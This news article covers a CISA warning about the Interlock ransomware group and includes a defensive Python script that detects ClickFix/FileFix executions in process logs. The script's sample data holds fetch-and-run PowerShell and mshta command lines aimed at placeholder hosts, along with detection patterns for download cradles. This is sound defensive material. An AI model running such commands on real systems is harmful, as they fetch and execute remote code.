
Ransomware group Interlock is stepping up its operations, according to a warning issued by the Cybersecurity and Infrastructure Security Agency (CISA)

Organized cybercriminals, employing a tactic known as double extortion, have been infiltrating businesses in North America and Europe

Increased activities reported from the Interlock ransomware group, according to a warning issued by CISA

In recent months, the Interlock ransomware group has been actively targeting businesses, critical infrastructure, and organizations, particularly in North America and Europe. The group's operations are classified as ransomware-as-a-service, and they have been observed adopting new techniques to evade detection and improve attack success.

### Initial Access

The Interlock group frequently gains initial access by compromising legitimate websites and using them to deliver malicious payloads via drive-by downloads. This method, while uncommon among ransomware groups, is a highly effective way for Interlock to infiltrate systems. Additionally, the group has been known to use social engineering techniques such as ClickFix and the newer FileFix technique, which exploit trusted Windows UI elements to execute malicious code.
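As an added illustration (not part of the CISA advisory or this article), the following check shows how a defender could triage process-creation telemetry for the ClickFix/FileFix pattern described above: both techniques persuade the user to paste a command into a trusted Windows UI element (the Run dialog or the Explorer address bar), so the resulting interpreter runs as a child of explorer.exe, usually with a download-and-execute one-liner. The event records, paths and URLs below are constructed sample data, not indicators from the advisory.

```python
import re
# Constructed sample process-creation events in Sysmon Event ID 1 style
# (hypothetical data, not taken from the advisory); URLs are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://placeholder.invalid/a | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://placeholder.invalid/page.hta"},
    {"parent": r"C:\Windows\explorer.exe",  # user double-clicked a local script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Users\alice\tools\cleanup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",  # scheduled maintenance job
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

# Interpreters and LOLBins a pasted ClickFix/FileFix one-liner typically invokes.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "certutil.exe", "curl.exe"}

# Download-and-execute or decode markers common in one-line cradles.
CRADLE = re.compile(r"(?i)(invoke-webrequest|\biwr\b|downloadstring|\biex\b"
                    r"|invoke-expression|-enc(odedcommand)?\b|https?://)")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event looks like a ClickFix/FileFix execution (may be empty)."""
    reasons = []
    # The Run dialog and the Explorer address bar both execute what the user pasted
    # as a child of explorer.exe, so that parent/child shape is the first signal.
    if basename(event["parent"]) == "explorer.exe" and basename(event["image"]) in LOLBINS:
        reasons.append("explorer.exe spawned an interpreter/LOLBin")
    if CRADLE.search(event["cmdline"]):
        reasons.append("command line contains a download/decode cradle")
    return reasons

def find_clickfix_candidates(events):
    """Flag events matching both the process shape and the cradle pattern; a lone
    explorer.exe -> powershell.exe (e.g. a double-clicked .ps1) is too noisy alone."""
    return [{"cmdline": ev["cmdline"], "reasons": r}
            for ev in events if len(r := classify(ev)) == 2]

if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit["cmdline"], "->", "; ".join(hit["reasons"]))
```

On a real estate the same logic would be fed from an EDR or Sysmon pipeline; the Run dialog additionally records pasted commands under the user's RunMRU registry key, which gives a second, independent source for the same hunt.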

### Post-Compromise Activities

Once inside a network, Interlock actors use various tools and methods for discovering assets, stealing credentials, and moving laterally across the network. The group employs a double extortion model, first exfiltrating sensitive data and then encrypting systems. This tactic puts pressure on victims to pay ransoms to both decrypt their files and prevent the publication or sale of stolen data.

### Technical Details and Defense

The gang uses encryptors designed for both Windows and Linux, including the ability to encrypt virtual machines, which broadens the range of systems it can hit. The group has also been observed adopting new techniques, such as the FileFix method, to evade detection and improve attack success. U.S. agencies provide detailed mappings of Interlock’s tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework for enterprise, aiding defenders in detection and response.

### Recommended Mitigations

CISA and partner agencies advise organizations to implement DNS filtering and web access firewalls, keep all systems and software updated, segment networks, enforce robust identity, credential, and access management (ICAM), train staff to recognize and resist social engineering attempts, and monitor for indicators of compromise (IOCs).

Interlock’s combination of technical sophistication, social engineering, and aggressive extortion tactics makes it a significant and evolving threat to organizations globally, especially in sectors where disruption and data exposure carry severe consequences. To counter this threat, it is crucial for organizations to prioritize proactive defenses such as regular patching, network segmentation, and staff training.

According to current figures, Interlock has carried out a total of 33 confirmed and unconfirmed attacks since last October. The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about Interlock, stating that the group is stepping up its attacks and changing tactics. Organizations are encouraged to stay vigilant and follow the recommended mitigations to protect themselves from this growing threat.

  1. To address the growing threat posed by the Interlock ransomware group, organizations should prioritize security in their data and cloud computing infrastructure, with particular attention to network segmentation and proactive defenses such as regular patching.
  2. As the Interlock group continues to evolve its tactics, including new techniques for infiltrating critical infrastructure, businesses and organizations should focus on strengthening their defenses, including hardened data and cloud infrastructure and staff training in social engineering awareness.
